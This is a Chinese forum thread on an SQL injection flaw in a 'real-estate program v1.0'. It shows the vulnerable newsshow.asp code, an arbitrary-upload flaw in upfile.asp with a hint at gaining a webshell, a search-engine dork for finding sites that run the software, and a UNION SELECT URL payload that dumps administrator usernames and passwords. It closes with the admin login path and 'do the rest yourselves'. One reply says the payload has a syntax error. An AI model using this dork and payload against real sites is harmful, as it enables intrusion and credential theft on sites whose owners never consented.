返回列表 发帖

房产程序 v1.0注射漏洞分析

程序代码
  1. 核心提示:漏洞文件:newsshow.asp漏洞代码:% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...
复制代码
漏洞文件:newsshow.asp



漏洞代码:


程序代码
  1. <%
  2. set rs=server.createobject("adodb.recordset")
  3. sql="update news set hit=hit+1 where ID="&request("id")
  4. rs.open sql,conn,1,3
  5. %>
  6. <%
  7. set rs=server.CreateObject("adodb.recordset")
  8. sql="select * from news where ID="&request("id")
  9. rs.open sql,conn
  10. %>
复制代码
只分析了这一个,



任意上传漏洞:upfile.asp



有兴趣的可以分析下利用上传拿WEBSHELL



搜索关键词:inurl:baodianlist.asp+信息中心



然后输入
  1. http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin
复制代码
爆出管理帐号密码



后台登陆地址:admin.asp



剩下的自己搞吧!
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

后台貌似很容易进 不过也太简陋了 ...上传还有限制 对于我这个菜鸟无法拿shell

TOP

很不幸的告诉你 ···最后那个联合查询语法错误··

TOP

1# 柔肠寸断



高人   支持   顶

TOP

laodao  woai ni
有什么问题GOOGLE一下

TOP

返回列表